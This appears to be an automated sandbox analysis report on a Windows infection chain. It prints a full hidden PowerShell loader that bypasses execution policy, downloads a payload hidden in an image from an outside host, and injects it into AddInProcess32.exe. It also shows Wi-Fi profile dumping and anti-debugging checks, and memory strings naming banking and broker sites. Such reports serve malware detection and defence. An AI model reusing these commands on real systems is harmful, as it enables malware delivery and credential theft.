Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000305F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachine: ;
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: momulumeguqemuyufum
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMToolsHook
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: powershell.exe, 00000005.00000002.1593249339.0000021C89401000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: gWtuVMciUCk47FiAJeN
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMToolsHook.dll
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmmousever.dll
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmmousever
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmmouseverLR
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qodoqemuned
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwareLR
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachine:
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMToolsHookLR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 9_2_06427368 CheckRemoteDebuggerPresent,

9_2_06427368

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Memory allocated: page read and write | page guard

System process connects to network (likely due to code injection or exploit)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe

Network Connect: 188.114.97.3 443

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7908.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 410000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 412000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: FAE008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredkdgtreodgtredgtrevdgtreddgtredgtremqdgtrezdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredgdgtremgdgtre4dgtredqdgtremqdgtrezdgtredgdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('runpe.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\c\program files\' , 'aburrar','addinprocess32',''))} }"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredkdgtreodgtredgtrevdgtreddgtredgtremqdgtrezdgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredgdgtremgdgtre4dgtredqdgtremqdgtrezdgtredgdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmd